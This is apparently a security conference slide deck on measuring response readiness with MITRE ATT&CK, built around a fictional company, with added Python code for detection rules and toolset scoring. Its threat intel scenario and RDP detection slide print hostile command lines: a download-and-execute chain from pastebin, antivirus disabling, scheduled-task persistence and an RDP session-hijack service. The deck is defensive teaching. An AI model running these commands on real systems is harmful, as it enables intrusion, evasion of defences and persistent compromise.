How to measure your security response readiness?
Tomasz Jakubowski
@perunhimself
tomasz@shellsquad.com
Lockheed Martin Cyber Kill Chain® - recap
Source: Seven Ways to Apply the Cyber Kill Chain® with a Threat Intelligence Platform
https://www.lockheedmartin.com/content/dam/lockheed-martin/rms/documents/cyber/Seven_Ways_to_Apply_the_Cyber_Kill_Chain_with_a_Threat_Intelligence_Platform.pdf
Chart: Detection vs Closure by kill-chain phase (Recon, Weaponization, Delivery, Exploitation, Installation, C&C, Actions on objectives); series: Detected, Closed; y-axis 0–60
Close the gap
MITRE ATT&CK ™
• Website: https://attack.mitre.org
• Quote:
“MITRE ATT&CK™ is a globally-accessible knowledge base of
adversary tactics and techniques based on real-world observations.
The ATT&CK knowledge base is used as a foundation for the
development of specific threat models and methodologies in the
private sector, in government, and in the cybersecurity product and
service community.”
MITRE ATT&CK ™
Tactics
• Answer WHY an action is performed by an adversary
• Provide useful context to individual techniques
Techniques
• Answer HOW an adversary achieves a tactical objective by performing an action (e.g. send a spearphishing email with an attachment to gain an initial foothold)
• Useful information for both red and blue teams
MITRE ATT&CK ™
Source: https://attack.mitre.org/theme/images/enterprise-pre-lifecycle.png
How to measure your security response readiness?
What is described
• Tactics (E: 12)
• Techniques (E: 266)
  • Description
  • Examples: Groups and/or software using this technique
  • Mitigation
  • Detection
  • References
• Groups (94)
  • Description
  • Aliases
  • Techniques used
  • Software used
  • References
• Software (414)
  • Description
  • Techniques used
  • Groups using it
  • References
There are just too many techniques! Shortlist!
e.g. Industry > Groups > Techniques
MITRE ATT&CK™ toolset
• MITRE ATT&CK™ Navigator
https://mitre-attack.github.io/attack-navigator/enterprise/
The “Target”
• Fictional company (or maybe not)
https://www.sensenet-library.com
• Provides services available online
• AI constructs – they just live in cyberspace
• it’s critical for them to be online!
• Construct – a copy of consciousness allowing for immortal life
in cyberspace
• Keeps confidential data on their internal network
• You don’t want people breaking in and making copies of
customers’ constructs
Network diagram of the Target: INTERNET – ROUTER – FIREWALL – SWITCH – FIREWALL – SWITCH; hosts: MAIL, WWW, PROXY, NIDS, NAV, DB, SIEM, SVR, USER1–USER4
On Host:
- FW
- AV
- IDS
Warm-up: Detection and Containment
LM Cyber Kill Chain® Countermeasures – columns: Detect, Deny, Disrupt, Degrade, Deceive, Contain (partially filled in)
• Reconnaissance: Firewall, Honeypot
• Weaponization: NIPS
• Delivery: (blank)
• Exploitation: AV
• Installation: (blank)
• Command & Control: AV
• Actions on Targets: (blank)
Completed: Detection and Containment
LM Cyber Kill Chain® Countermeasures – columns: Detect, Deny, Disrupt, Degrade, Deceive, Contain (entries listed per phase, left to right across the columns)
• Reconnaissance: Web Analytics, Web logs, Router Logs, NIDS, Firewall, Honeypot, Redirect Loop, Honeypot, Redirect Loops, Firewall
• Weaponization: NIDS, NIPS, NIPS
• Delivery: NIDS, HIDS, AV, Web Filter, Mail Filter, Inline AV, Mail Filter, Web Filter, Queuing, Sinkhole, Combination of Deny/Disrupt, Honeypot, App-Aware Firewall, Honeypot
• Exploitation: HIDS, NIDS, AV, Patch, AV, HIPS, Patch, AV, HIPS, Highly restricted User Accounts, Honeypot, Inter-Zone NIPS
• Installation: HIDS, Application Logs, AV, NetFlow, App Whitelisting, Blocked Execution, AV, HIPS, Combination of Deny/Disrupt, Honeypot
• Command & Control: NIDS, HIDS, AV, Firewall, Sinkhole, NIPS, DEP, Sinkhole, Tarpit, Sinkhole, DNS Redirect, Sinkhole
• Actions on Targets: Audit Logs, DEP, AV, NIDS, HIDS, Firewall, Network Segmentation, DLP, Network Segmentation, HIPS, Network Segmentation, Honeypot
Scenario 1: OMG! New vulnerability
• CVE-2029-0708 – Online Surrogate Service Remote Code Execution
• A remote code execution vulnerability exists in Online Surrogate Services when an unauthenticated attacker
connects to the target system using RDP and sends specially crafted requests. This vulnerability requires no
user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the
target surrogate that can lead to complete takeover of the surrogate.
• To exploit this vulnerability, an attacker would need to send a specially crafted request to the target
surrogate Online Surrogate Service via RDP.
• The update addresses the vulnerability by correcting how Online Surrogate Services handles connection
requests.
• You’ve checked – you have an old version of the software and you can’t patch right now due to some other
dependencies that need to be sorted out first
Exploitability assessment:
• Publicly Disclosed: Yes
• Proof of Concept: Yes
• Exploited: Yes
• Latest Software Release: 4 – Not affected
• Older Software Release: 1 – Exploitation More Likely
• Denial of Service: No
Source: https://mitre-attack.github.io/attack-navigator/enterprise/
T1076: Remote Desktop Protocol
• Mitigation
  • Disable the RDP service if it is unnecessary,
  • remove unnecessary accounts and groups from Remote Desktop Users groups,
  • enable firewall rules to block RDP traffic between network security zones,
  • audit the Remote Desktop Users group membership regularly,
  • remove the local Administrators group from the list of groups allowed to log in through RDP,
  • limit remote user permissions if remote access is necessary,
  • use remote desktop gateways and multifactor authentication for remote logins,
  • do not leave RDP accessible from the internet,
  • change GPOs to define shorter session timeouts and the maximum amount of time any single session can be active,
  • change GPOs to specify the maximum amount of time that a disconnected session stays active on the RD session host server.
• Detection
  • Use of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP,
  • monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time,
  • set up process monitoring for tscon.exe usage and monitor service creation that uses cmd.exe /k or cmd.exe /c in its arguments to prevent RDP session hijacking (e.g. sc create sesshijack binpath= “cmd.exe /k tscon 4 /dest:console” and then: net start sesshijack).
https://attack.mitre.org/techniques/T1076/
Groups using it: 16; Software using it: 8
• Multi-Stage Backdoor Dropper Document Possibly Targeting Online Services Vendors Observed
• 1st stage: Dropper Document after enabling VBA macros executes mshta.exe with the following command line: mshta.exe http://www.tinyurl[.]com/shlsqd
• The referenced TinyURL address redirects to https://www.faild2ptch[.]com/oh/no.html, which provides URL-escaped JavaScript (JS) that performs the following actions:
  1. Removes OS Defender dynamic signatures using the following command line: MpCmdRun.exe -removedefinitions -dynamicsignatures
  2. Kills all open Office applications using the following command line: taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE
  3. Kills the OS Defender notification process using the command line: taskkill /f /im MSASCuiL.exe
  4. Disables unsafe files being opened in protected view by writing to one of the following registry paths: HKCU\Software\Microsoft\Office\[11-16].0\[Excel|Word|PowerPoint]\Security\ProtectedView\DisableUnsafeLocationsInPV
  5. Downloads and executes a remotely hosted .NET PE https://pastebin[.]com/raw/dhVymUy3 using PowerShell executed by mshta.exe with the following command line: mshta.exe vbscript:CreateObject(Wscript.Shell).Run(powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('h'+'t'+'t'+'p'+'s:'+'//p'+'a'+'s'+'t'+'e'+'b'+'i'+'n'+'.'+'c'+'o'+'m (window.close)
  6. Creates a registry run key under HKCU\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftUpdate with the following command line to execute a scheduled task every 100 minutes to download and execute a remote payload using mshta.exe: schtasks /create /sc MINUTE /mo 100 /tn "eScan Backup" /tr "mshta vbscript:CreateObject("Wscript.Shell").Run("mshta.exe https://pastebin[.]com/raw/df861P8c",0,true)(window.close)"" /F
Scenario 2: Threat Intel Report
Techniques mapped from the report:
• T1193: Spearphishing Attachment
• T1089: Disabling Security Tools
• T1170: Mshta
• T1481: Web Service
• T1053: Scheduled Task
• T1027: Obfuscated Files or Information
• T1064: Scripting
• T1086: PowerShell
• T1112: Modify Registry
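As an added example (not part of the talk's slides), the indicators in the Scenario 2 report and the T1076 detection guidance quoted earlier can be written as technique-tagged rules over endpoint telemetry, so that every rule hit is counted against one of the shortlisted techniques rather than sitting as an untyped alert. The Event and Finding structures, the rule logic and the sample events are all constructed for this example; host names (USER2, SVR, USER1) are borrowed from the Target's network diagram and the URLs use the reserved .invalid TLD.

```python
"""Technique-tagged detection over constructed endpoint events.

Added example, not code from the talk. Each rule encodes one indicator the
slides describe (the Scenario 2 report, the ATT&CK T1076 detection text) and
tags a match with the technique ID the deck lists for it.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Event:
    host: str
    kind: str     # "process": parent image, created image, command line
                  # "registry": writing image, key path, value name
    parent: str
    image: str
    detail: str


@dataclass(frozen=True)
class Finding:
    host: str
    technique: str
    reason: str


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "mspub.exe"}
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe"}


def _name(path: str) -> str:
    """Lower-cased file name of an image path (handles both slash styles)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: Event) -> list:
    """Return the findings (technique ID plus reason) that one event triggers."""
    hits = []
    if ev.kind == "registry":
        key, value = ev.image.lower(), ev.detail.lower()
        if key.endswith("\\currentversion\\run"):
            hits.append(("T1112", f"run key value '{ev.detail}' set by {_name(ev.parent)}"))
        if key.endswith("\\protectedview") and value == "disableunsafelocationsinpv":
            hits.append(("T1112", "Office Protected View disabled via registry"))
        return [Finding(ev.host, t, r) for t, r in hits]

    parent, image, cmd = _name(ev.parent), _name(ev.image), ev.detail.lower()
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        hits.append(("T1193", f"{parent} spawned {image}"))
    if image == "mshta.exe" and ("http" in cmd or "vbscript:" in cmd):
        hits.append(("T1170", "mshta.exe launched with a URL or inline script"))
    if (image == "mpcmdrun.exe" and "-removedefinitions" in cmd) or \
       (image == "taskkill.exe" and "msascuil.exe" in cmd):
        hits.append(("T1089", "AV definitions removed or AV UI process killed"))
    if image == "powershell.exe" and "frombase64string" in cmd:
        hits.append(("T1086", "PowerShell loading an assembly from memory"))
        hits.append(("T1027", "base64-encoded payload on the command line"))
    if image == "schtasks.exe" and "/create" in cmd and "mshta" in cmd:
        hits.append(("T1053", "scheduled task whose action runs mshta"))
    if "tscon" in cmd and (image == "cmd.exe" or (image == "sc.exe" and " create " in cmd)):
        hits.append(("T1076", "tscon via cmd.exe or a created service (session hijack indicator)"))
    return [Finding(ev.host, t, r) for t, r in hits]


def techniques_seen(events) -> list:
    """Sorted, de-duplicated technique IDs triggered by a batch of events."""
    return sorted({f.technique for ev in events for f in classify(ev)})


# Constructed sample telemetry mirroring the report's chain (not real data).
SAMPLE_EVENTS = [
    Event("USER2", "process", "WINWORD.EXE", "mshta.exe",
          "mshta.exe http://shortener.invalid/abc"),
    Event("USER2", "process", "mshta.exe", "MpCmdRun.exe",
          "MpCmdRun.exe -removedefinitions -dynamicsignatures"),
    Event("USER2", "process", "mshta.exe", "taskkill.exe", "taskkill /f /im MSASCuiL.exe"),
    Event("USER2", "registry", "mshta.exe",
          "HKCU\\Software\\Microsoft\\Office\\16.0\\Word\\Security\\ProtectedView",
          "DisableUnsafeLocationsInPV"),
    Event("USER2", "process", "mshta.exe", "powershell.exe",
          "powershell.exe -noexit -command [Reflection.Assembly]::Load("
          "[System.Convert]::FromBase64String((New-Object Net.WebClient)"
          ".DownloadString('https://paste.invalid/raw/x')))"),
    Event("USER2", "registry", "mshta.exe",
          "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "MicrosoftUpdate"),
    Event("USER2", "process", "mshta.exe", "schtasks.exe",
          'schtasks /create /sc MINUTE /mo 100 /tn "eScan Backup" /tr "mshta vbscript:..." /F'),
    Event("SVR", "process", "services.exe", "cmd.exe", "cmd.exe /k tscon 4 /dest:console"),
    Event("USER1", "process", "explorer.exe", "WINWORD.EXE",          # benign control
          '"C:\\Program Files\\Microsoft Office\\WINWORD.EXE" /n quarterly.docx'),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        for f in classify(ev):
            print(f"{f.host:6} {f.technique} {f.reason}")
    print("techniques covered:", ", ".join(techniques_seen(SAMPLE_EVENTS)))
```

The point of tagging at rule level is that `techniques_seen` can be compared directly against the shortlist: a technique with no rule that ever fires is one where the readiness score is at most "centrally logged", whatever the toolset claims.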
How to measure your security response readiness?
Maturity
0 = We do nothing
1 = Locally logged – relevant data is captured on the endpoint
2 = Centrally logged – data is gathered centrally
3 = Correlated / enriched – logs for the event are enriched with data from other sources to increase fidelity
4 = Alerting – we have rules to detect anomalies and suspicious events
5 = Playbook exists – a process to respond exists (incl. analyse, contain, eradicate, recover)
6 = Response is automated – we have automated response for this alert
Scenario 3: It’s all about the money
• There is an ongoing trade war between the 2 biggest economies in the world
• Unfortunately this has an impact on the wealthiest people, who are
Sense//Net Library’s customers
• A few of them decided to put their AI constructs to sleep until better times
come, hence your profits decrease
• The management decided it’s time to cut costs and your department needs
to participate
• You don’t want to cut people – they are a great team – so you focus on
vendor contracts that are going to be renewed this year – which security
control can you afford to get rid of?
Measure effectiveness of the toolset
MITRE ATT&CK techniques vs. the current toolset (Tool1 – Tool8), scored in four column groups:
• Early warning (Reconnaissance): [2] Would Warn of Activity, [0] N/A
• Inbound Protect (Weaponization, Delivery): [2] Would Block Activity, [1] Could Block Activity, [0] Would Not Block Activity
• Detect (Weaponization, Delivery, C2): [2] Would Detect Activity, [0] No Detection or N/A
• Outbound Protect (Exploit, Installation, C2, AOO): [2] Would Block Outbound Traffic, [1] Could Have Blocked, [0] Would Not Block Activity
Shortlisted techniques (rows):
• T1193: Spearphishing Attachment
• T1089: Disabling Security Tools
• T1112: Modify Registry
• T1086: PowerShell
• T1053: Scheduled Task
Source: Seven Ways to Apply the Cyber Kill Chain® with a Threat Intelligence Platform
https://www.lockheedmartin.com/content/dam/lockheed-martin/rms/documents/cyber/Seven_Ways_to_Apply_the_Cyber_Kill_Chain_with_a_Threat_Intelligence_Platform.pdf
Measure effectiveness of the toolset – toolset measure
Columns: Tool1 … Tool8 in four groups – Early warning (Reconnaissance), Inbound Protect (Weaponization, Delivery), Detect (Weaponization, Delivery, C2), Outbound Protect (Exploit, Installation, C2, AOO) – followed by the technique totals for the Current and the Proposed toolset.
T1193: Spearphishing Attachment: 0 0 2 1 2 0 2 1 | Current 8, Proposed 7
T1089: Disabling Security Tools: 2 0 0 2 2 0 2 1 | Current 9, Proposed 8
T1112: Modify Registry: 0 0 2 1 2 0 2 1 | Current 8, Proposed 7
T1086: PowerShell: 2 0 0 2 2 0 2 1 | Current 9, Proposed 8
T1053: Scheduled Task: 2 0 2 1 0 2 2 1 | Current 10, Proposed 7
Total: Current 44 (100%), Proposed 37 (84%)
Legend – Early warning: [2] Would Warn of Activity, [0] N/A; Inbound Protect: [2] Would Block Activity, [1] Could Block Activity, [0] Would Not Block Activity; Detect: [2] Would Detect Activity, [0] No Detection or N/A; Outbound Protect: [2] Would Block Outbound Traffic, [1] Could Have Blocked, [0] Would Not Block Activity
Source: Seven Ways to Apply the Cyber Kill Chain® with a Threat Intelligence Platform
https://www.lockheedmartin.com/content/dam/lockheed-martin/rms/documents/cyber/Seven_Ways_to_Apply_the_Cyber_Kill_Chain_with_a_Threat_Intelligence_Platform.pdf
Scenario 4: Let’s go shopping
• Times are changing and the company profits picked up
• You successfully argued to get a bigger budget and now you can
spend some money on a new security control
• Your team shortlisted a few vendors and you’ve conducted a PoC
• The results show that there are a few differences between the products
• The procurement team negotiated almost identical prices for the products
Measure effectiveness of the toolset – current vs. future toolset
Columns: the remaining Tool1 … Tool8 scores plus the candidates ToolA and ToolB, in the same four groups – Early warning (Reconnaissance), Inbound Protect (Weaponization, Delivery), Detect (Weaponization, Delivery, C2), Outbound Protect (Exploit, Installation, C2, AOO) – followed by the technique totals Current, Proposed A and Proposed B.
T1193: Spearphishing Attachment: 0 2 1 2 2 | ToolA 2, ToolB 0 | Current 7, Proposed A 9, Proposed B 7
T1089: Disabling Security Tools: 2 0 2 2 2 | ToolA 0, ToolB 2 | Current 8, Proposed A 8, Proposed B 10
T1112: Modify Registry: 0 2 1 2 2 | ToolA 2, ToolB 0 | Current 7, Proposed A 9, Proposed B 7
T1086: PowerShell: 2 0 2 2 2 | ToolA 0, ToolB 0 | Current 8, Proposed A 8, Proposed B 8
T1053: Scheduled Task: 2 2 1 0 2 | ToolA 2, ToolB 0 | Current 7, Proposed A 9, Proposed B 7
Totals against the previous (reduced) toolset: Current 37 (100%), Proposed A 43 (116%), Proposed B 39 (105%)
Totals against the original toolset: 44 (100%), Proposed A 43 (98%), Proposed B 39 (89%)
Legend – Early warning: [2] Would Warn of Activity, [0] N/A; Inbound Protect: [2] Would Block Activity, [1] Could Block Activity, [0] Would Not Block Activity; Detect: [2] Would Detect Activity, [0] No Detection or N/A; Outbound Protect: [2] Would Block Outbound Traffic, [1] Could Have Blocked, [0] Would Not Block Activity; Proposal: [2] Proposal Applicable, [0] N/A
Previous compared to Proposed A and B
Source: Seven Ways to Apply the Cyber Kill Chain® with a Threat Intelligence Platform
https://www.lockheedmartin.com/content/dam/lockheed-martin/rms/documents/cyber/Seven_Ways_to_Apply_the_Cyber_Kill_Chain_with_a_Threat_Intelligence_Platform.pdf
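The scoring behind Scenarios 3 and 4, as an added worked example in Python (not code from the talk). The legend values are the slides'; everything else is an assumption made for the example: the placement of Tool1–Tool8 in the four column groups (two per group), the Tool1..Tool8 order of the scores, the cut of Tool6 and Tool8 in the proposal, and the ToolA/ToolB scores. Those assumptions are chosen so that the computed totals reproduce the slides (44 then 37 and 84%; 43 and 39 against both baselines). The example also goes one step beyond the slides by validating every score against the legend of its column group, which catches a typo such as a "1" in the Early warning group, where only 2 and 0 are defined.

```python
"""Toolset effectiveness per shortlisted ATT&CK technique (Scenarios 3 and 4).

Added worked example, not code from the talk. Legend values are the slide's;
the placement of Tool1..Tool8 in the four column groups, the Tool1..Tool8
order of the scores, the tools cut in the proposal and the candidate tool
scores are assumptions chosen so the totals reproduce the slides.
"""
from dataclasses import dataclass

# Allowed scores per column group, from the slide legend.
LEGEND = {
    "early_warning": {2: "Would Warn of Activity", 0: "N/A"},
    "inbound_protect": {2: "Would Block Activity", 1: "Could Block Activity",
                        0: "Would Not Block Activity"},
    "detect": {2: "Would Detect Activity", 0: "No Detection or N/A"},
    "outbound_protect": {2: "Would Block Outbound Traffic", 1: "Could Have Blocked",
                         0: "Would Not Block Activity"},
}


@dataclass(frozen=True)
class Tool:
    name: str
    group: str  # key into LEGEND


# Assumed: two tools per column group, in slide order.
TOOLS = [
    Tool("Tool1", "early_warning"), Tool("Tool2", "early_warning"),
    Tool("Tool3", "inbound_protect"), Tool("Tool4", "inbound_protect"),
    Tool("Tool5", "detect"), Tool("Tool6", "detect"),
    Tool("Tool7", "outbound_protect"), Tool("Tool8", "outbound_protect"),
]

# Scores read off the Scenario 3 slide, assumed to be in Tool1..Tool8 order.
SCORES = {
    "T1193: Spearphishing Attachment": [0, 0, 2, 1, 2, 0, 2, 1],
    "T1089: Disabling Security Tools": [2, 0, 0, 2, 2, 0, 2, 1],
    "T1112: Modify Registry":          [0, 0, 2, 1, 2, 0, 2, 1],
    "T1086: PowerShell":               [2, 0, 0, 2, 2, 0, 2, 1],
    "T1053: Scheduled Task":           [2, 0, 2, 1, 0, 2, 2, 1],
}

# Assumed cut for Scenario 3: dropping Tool6 and Tool8 yields the slide's Proposed column.
CUT = ("Tool6", "Tool8")

# Constructed candidate scores for Scenario 4 (both candidates placed in the Detect group).
CANDIDATES = {
    Tool("ToolA", "detect"): dict(zip(SCORES, [2, 0, 2, 0, 2])),
    Tool("ToolB", "detect"): dict(zip(SCORES, [0, 2, 0, 0, 0])),
}


def validate(tools, scores):
    """Reject a score sheet with a value outside the legend of the tool's group."""
    for technique, row in scores.items():
        if len(row) != len(tools):
            raise ValueError(f"{technique}: expected {len(tools)} scores, got {len(row)}")
        for tool, score in zip(tools, row):
            if score not in LEGEND[tool.group]:
                raise ValueError(f"{technique}/{tool.name}: {score} not allowed in {tool.group}")


def technique_totals(tools, scores, exclude=()):
    """Per-technique sum over the tools that remain after excluding some."""
    return {technique: sum(s for t, s in zip(tools, row) if t.name not in exclude)
            for technique, row in scores.items()}


def toolset_total(tools, scores, exclude=()):
    return sum(technique_totals(tools, scores, exclude).values())


def percent_of(total, baseline):
    """Toolset score relative to a baseline, as the slides show it (100% = baseline)."""
    return round(100 * total / baseline)


def with_candidate(tools, scores, candidate, candidate_scores):
    """Score sheet extended with one candidate tool (Scenario 4)."""
    new_tools = tools + [candidate]
    new_scores = {t: row + [candidate_scores[t]] for t, row in scores.items()}
    validate(new_tools, new_scores)
    return new_tools, new_scores


if __name__ == "__main__":
    validate(TOOLS, SCORES)
    current = toolset_total(TOOLS, SCORES)
    reduced = toolset_total(TOOLS, SCORES, exclude=CUT)
    print(f"Scenario 3: current {current}, proposed {reduced} ({percent_of(reduced, current)}%)")
    for cand, cand_scores in CANDIDATES.items():
        tools, scores = with_candidate(TOOLS, SCORES, cand, cand_scores)
        total = toolset_total(tools, scores, exclude=CUT)
        print(f"Scenario 4: with {cand.name} {total} ({percent_of(total, reduced)}% of reduced, "
              f"{percent_of(total, current)}% of original)")
```

Keeping the tool list and the score sheet separate means the same sheet answers both questions the talk asks: "which control can we afford to lose" is an `exclude`, "which candidate buys the most" is a `with_candidate`, and both are compared to the same baseline.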
Other use cases
Source:
https://attack.mitre.org/docs/attack_roadmap.pdf
Putting it all
together
Vulnerability reports
Threat Intel reports
Toolset effectiveness
Response maturity
...

More Related Content

PDF
Malware collection and analysis
PDF
Android Application Security
PDF
Security events in 2014
PDF
PDF
2012 S&P Paper Reading Session1
PPTX
Dealing with legacy code
PPTX
DFIR Austin Training (Feb 2020): Remote Access & Deploying Agents
PDF
Windows server hardening 1
Malware collection and analysis
Android Application Security
Security events in 2014
2012 S&P Paper Reading Session1
Dealing with legacy code
DFIR Austin Training (Feb 2020): Remote Access & Deploying Agents
Windows server hardening 1

What's hot (20)

PDF
Threat Con 2021: What's Hitting my Honeypots
PPTX
External to DA, the OS X Way
PPTX
Web application security part 01
PPTX
BlueHat v17 || All Your Cloud Are Belong to Us; Hunting Compromise in Azure
PDF
The Dark Side of PowerShell by George Dobrea
PDF
3. APTs Presentation
PPTX
Integrated Tools in OSSIM
PDF
MITRE ATT&CKcon 2018: ATT&CK as a Teacher, Travis Smith, Tripwire
PPTX
technical overview - endpoint protection 10.3.3
PPTX
Web application security part 02
PPT
DDoS Attacks
PPTX
Lateral Movement - Phreaknik 2016
PDF
Lateral Movement: How attackers quietly traverse your Network
PDF
Defcon 22-tim-mcguffin-one-man-shop
PDF
CSW2017 chuanda ding_state of windows application security
PDF
Web App Security Presentation by Ryan Holland - 05-31-2017
PPTX
Advanced Client Side Exploitation Using BeEF
 
PDF
Sigma Hall of Fame - EU ATT&CK User Workshop, October 2021
PDF
(130216) #fitalk potentially malicious ur ls
PDF
CNIT 128 8. Android Implementation Issues (Part 3)
Threat Con 2021: What's Hitting my Honeypots
External to DA, the OS X Way
Web application security part 01
BlueHat v17 || All Your Cloud Are Belong to Us; Hunting Compromise in Azure
The Dark Side of PowerShell by George Dobrea
3. APTs Presentation
Integrated Tools in OSSIM
MITRE ATT&CKcon 2018: ATT&CK as a Teacher, Travis Smith, Tripwire
technical overview - endpoint protection 10.3.3
Web application security part 02
DDoS Attacks
Lateral Movement - Phreaknik 2016
Lateral Movement: How attackers quietly traverse your Network
Defcon 22-tim-mcguffin-one-man-shop
CSW2017 chuanda ding_state of windows application security
Web App Security Presentation by Ryan Holland - 05-31-2017
Advanced Client Side Exploitation Using BeEF
 
Sigma Hall of Fame - EU ATT&CK User Workshop, October 2021
(130216) #fitalk potentially malicious ur ls
CNIT 128 8. Android Implementation Issues (Part 3)
Ad

Similar to How to measure your security response readiness? (20)

PPTX
RH-ISAC Summit 2019 - Adam Pennington - Leveraging MITRE ATT&CK™ for Detectio...
PDF
RH-ISAC Summit 2019 - Adam Pennington - Leveraging MITRE ATT&CK™ for Detectio...
PDF
BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status Quo
PDF
Slideshare.net rh-isac summit 2019 - adam pennington - leveraging mitre at ta...
PDF
Becoming a Yogi on Mac ATT&CK with OceanLotus Postures
PDF
Update from the MITRE ATT&CK Team
PDF
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CK
PDF
Anomali Detect 19 - Nickels & Pennington - Turning Intelligence into Action w...
PDF
Upgrade your attack model: finding and stopping fileless attacks with MITRE A...
PPTX
Putting MITRE ATT&CK into Action with What You Have, Where You Are
PDF
Leveraging Campaigns to Untangle the Threat Group Ship of Theseus
PDF
Pennington - Defending Against Targeted Ransomware with MITRE ATT&CK
PDF
FIRST CTI Symposium: Turning intelligence into action with MITRE ATT&CK™
PDF
MITRE-Module 1 Slides.pdf
PDF
State of the ATT&CK - ATT&CKcon Power Hour
PDF
Ce hv8 module 17 evading ids, firewalls, and honeypots
PDF
(SACON) Wasim Halani & Arpan Raval - Practical Threat Hunting - Developing an...
PDF
State of the ATTACK
PDF
Getting Bear-y Cozy with PowerShell
PDF
One Technique, Two Techniques, Red Technique, Blue Technique
RH-ISAC Summit 2019 - Adam Pennington - Leveraging MITRE ATT&CK™ for Detectio...
RH-ISAC Summit 2019 - Adam Pennington - Leveraging MITRE ATT&CK™ for Detectio...
BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status Quo
Slideshare.net rh-isac summit 2019 - adam pennington - leveraging mitre at ta...
Becoming a Yogi on Mac ATT&CK with OceanLotus Postures
Update from the MITRE ATT&CK Team
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CK
Anomali Detect 19 - Nickels & Pennington - Turning Intelligence into Action w...
Upgrade your attack model: finding and stopping fileless attacks with MITRE A...
Putting MITRE ATT&CK into Action with What You Have, Where You Are
Leveraging Campaigns to Untangle the Threat Group Ship of Theseus
Pennington - Defending Against Targeted Ransomware with MITRE ATT&CK
FIRST CTI Symposium: Turning intelligence into action with MITRE ATT&CK™
MITRE-Module 1 Slides.pdf
State of the ATT&CK - ATT&CKcon Power Hour
Ce hv8 module 17 evading ids, firewalls, and honeypots
(SACON) Wasim Halani & Arpan Raval - Practical Threat Hunting - Developing an...
State of the ATTACK
Getting Bear-y Cozy with PowerShell
One Technique, Two Techniques, Red Technique, Blue Technique
Ad

Recently uploaded (20)

PPTX
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
PDF
Blue Purple Modern Animated Computer Science Presentation.pdf.pdf
PDF
Reach Out and Touch Someone: Haptics and Empathic Computing
PDF
Accuracy of neural networks in brain wave diagnosis of schizophrenia
PPTX
1. Introduction to Computer Programming.pptx
PDF
Mobile App Security Testing_ A Comprehensive Guide.pdf
PDF
Diabetes mellitus diagnosis method based random forest with bat algorithm
PPT
“AI and Expert System Decision Support & Business Intelligence Systems”
PDF
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
PDF
A comparative analysis of optical character recognition models for extracting...
PDF
Encapsulation theory and applications.pdf
PDF
Unlocking AI with Model Context Protocol (MCP)
PPT
Teaching material agriculture food technology
PPTX
Spectroscopy.pptx food analysis technology
PPTX
Digital-Transformation-Roadmap-for-Companies.pptx
PPTX
Programs and apps: productivity, graphics, security and other tools
PDF
The Rise and Fall of 3GPP – Time for a Sabbatical?
PDF
Building Integrated photovoltaic BIPV_UPV.pdf
PDF
TokAI - TikTok AI Agent : The First AI Application That Analyzes 10,000+ Vira...
PDF
Getting Started with Data Integration: FME Form 101
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
Blue Purple Modern Animated Computer Science Presentation.pdf.pdf
Reach Out and Touch Someone: Haptics and Empathic Computing
Accuracy of neural networks in brain wave diagnosis of schizophrenia
1. Introduction to Computer Programming.pptx
Mobile App Security Testing_ A Comprehensive Guide.pdf
Diabetes mellitus diagnosis method based random forest with bat algorithm
“AI and Expert System Decision Support & Business Intelligence Systems”
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
A comparative analysis of optical character recognition models for extracting...
Encapsulation theory and applications.pdf
Unlocking AI with Model Context Protocol (MCP)
Teaching material agriculture food technology
Spectroscopy.pptx food analysis technology
Digital-Transformation-Roadmap-for-Companies.pptx
Programs and apps: productivity, graphics, security and other tools
The Rise and Fall of 3GPP – Time for a Sabbatical?
Building Integrated photovoltaic BIPV_UPV.pdf
TokAI - TikTok AI Agent : The First AI Application That Analyzes 10,000+ Vira...
Getting Started with Data Integration: FME Form 101

How to measure your security response readiness?

  • 1. How to measure your security response readiness? Tomasz Jakubowski @perunhimself tomasz@shellsquad.com
  • 2. Lockheed Martin Cyber Kill Chain® - recap Source: Seven Ways to Apply the Cyber Kill Chain® with a Threat Intelligence Platform https://www.lockheedmartin.com/content/dam/lockheed- martin/rms/documents/cyber/Seven_Ways_to_Apply_the_Cyber_Kill_Chain_with_a_Threat_Intelligence_Platform.pdf
  • 3. 0 10 20 30 40 50 60 Recon Weaponization Delivery Exploitation Installation C&C Actions on objectives Detection vs Closure Detected Closed Close the gap
  • 4. MITRE ATT&CK ™ • Website: https://attack.mitre.org • Quote: “MITRE ATT&CK™ is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. The ATT&CK knowledge base is used as a foundation for the development of specific threat models and methodologies in the private sector, in government, and in the cybersecurity product and service community.”
  • 5. MITRE ATT&CK ™ Tactics Techniques • Answers WHY an action is performed by an adversary • Provide useful context to individual techniques • Answers HOW an adversary achieves a tactical objective by performing an action (e.g. send spearphising email with an attachment to gain initial foothold) • Useful information for both red and blue teams MITRE ATT&CK ™ Tactics Techniques • Answers WHY an action is performed by an adversary • Provide useful context to individual techniques • Answers HOW an adversary achieves a tactical objective by performing an action (e.g. send spearphising email with an attachment to gain initial foothold) • Useful information for both red and blue teams
  • 6. MITRE ATT&CK ™ Source: https://attack.mitre.org/theme/images/enterprise-pre-lifecycle.png
